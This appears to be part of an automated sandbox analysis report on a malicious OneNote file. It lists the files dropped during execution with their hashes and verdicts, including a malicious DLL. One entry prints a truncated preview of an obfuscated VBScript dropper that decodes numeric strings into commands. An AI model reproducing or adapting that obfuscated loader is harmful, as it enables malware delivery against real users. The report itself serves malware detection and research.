                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):55113
                                                                                                                                                                                                          Entropy (8bit):5.216959514455489
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                                                                                                                          MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                                                                                                                          SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                                                                                                                          SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                                                                                                                          SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):362512
                                                                                                                                                                                                          Entropy (8bit):7.486513932708276
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:pyHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:/WZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
                                                                                                                                                                                                          MD5:F29F0C388DAAD4D7982D8C92F752B9F2
                                                                                                                                                                                                          SHA1:29FCFE714B39CB1A95754774FE36A32FC35EAFAE
                                                                                                                                                                                                          SHA-256:F2BBEDE411F5379C58828A197F3F3C75C9AB3D9850180393FC72C2BD915B2662
                                                                                                                                                                                                          SHA-512:C9B24029C9C899B58497DB9EBBFC56CF148B01440F7DB2E16E13AF0FEA17D118093C7ABB412E95FB04503836CC1CCE9BAF083D58DBA5B5C8F462967CDC0B8886
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5136
                                                                                                                                                                                                          Entropy (8bit):2.772191483570955
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:DnLW/uIPv4om1mAlthbXg1jveqac0bac3:3nrD8j1a9baq
                                                                                                                                                                                                          MD5:E308FDC79B4FD9F87811A620F420986F
                                                                                                                                                                                                          SHA1:BC7B2C1F609E08FED3D4125856DE5F761CD71F62
                                                                                                                                                                                                          SHA-256:4DB78E5821A0CC251613316ED59F395A518809B79B6B09030B1C40E2520F60ED
                                                                                                                                                                                                          SHA-512:B20A355BC41B3A9F549ABFFEB57814C306471C1CD2CF678DE8651BD56E57A038F85CF1E4360308491A6C0383C9AE3FCF7259BCEE5F48AD1C5009A0BD40AB991E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                          Entropy (8bit):0.32574036610450463
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:Uu5YLys2xX/7Ek3ab+6RKQ137v+uuv8BAN:dGLy7Ba9lL+Rv8s
                                                                                                                                                                                                          MD5:FB0832C9CDE44C7942320AB1FC7295C0
                                                                                                                                                                                                          SHA1:4CBA835708E7B8686DF11198BDFD9889A3F48E63
                                                                                                                                                                                                          SHA-256:914672BDA24130828AEE46F638554536725D3E84302BBB459F160E0DB39BE23A
                                                                                                                                                                                                          SHA-512:E1C3345AEC5F2E043AD0799F8B3FF22A5BC9148BA8011E38F32DCE2905C6BA592AE68D71DB9D1EBE07822444ABFAF63C1C2B63B129319D39BE909679AEE48EE5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.@..`...........................................`.......................................::...............@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1.............................................................eZf..... ......;.X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                          Entropy (8bit):2.94770277922009
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:tWn:tWn
                                                                                                                                                                                                          MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                                                                                                                                          SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                                                                                                                                          SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                                                                                                                                          SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:badum tss
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):316928
                                                                                                                                                                                                          Entropy (8bit):7.337848702590508
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                                                                                                                          MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                                                                                                                          SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                                                                                                                          SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                                                                                                                          SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                          • Filename: INNOVINC.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing_2.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing_1.one, Detection: malicious, Browse
                                                                                                                                                                                                          • Filename: Insight_Medical_Publishing_3.one, Detection: malicious, Browse
